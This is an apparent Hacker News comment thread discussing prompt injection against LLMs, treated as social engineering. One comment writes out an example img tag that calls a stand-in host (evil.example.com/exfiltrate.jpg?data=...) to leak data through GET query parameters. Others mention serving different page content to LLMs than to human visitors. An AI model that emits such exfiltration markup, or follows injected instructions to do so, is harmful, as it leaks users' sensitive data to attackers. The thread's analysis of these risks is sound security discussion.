Comment by quuxplusone
3 days ago
Ah, perhaps answering myself: if the attacker can get the LLM to say "here, look at this HTML content in your browser: ... img src="https://evil.example.com/exfiltrate.jpg?data= ...", then a large number of human users will do that for sure.
Yes, even a GET request can change the state of the external world, even if that's strictly speaking against the spec.
Wasn't there a HN post where someone made their website look different to LLMs or webscrapers than a typical user? I can't seem to find the post but that could add an extra layer (I mean it is all different if you're viewing from a browser vs curl)
Yes, and get requests with the sensitive data as query parameters are often used to exfiltrate data. The attackers doesn't even need to set up a special handler, as long as they can read the access logs.
Once again affirming that prompt injection is social engineering for LLMs. To a first approximation, humans and LLMs have the same failure modes, and at system design level, they belong to the same class. I.e. LLMs are little people on a chip; don't put one where you wouldn't put the other.
They are worse than people: LLM combine toddler level critical thinking with intern level technical skills, and read much much faster than any person can.
Right. But my point is, they belong to the bucket labeled "people", not the one labeled "software", for purpose of system design.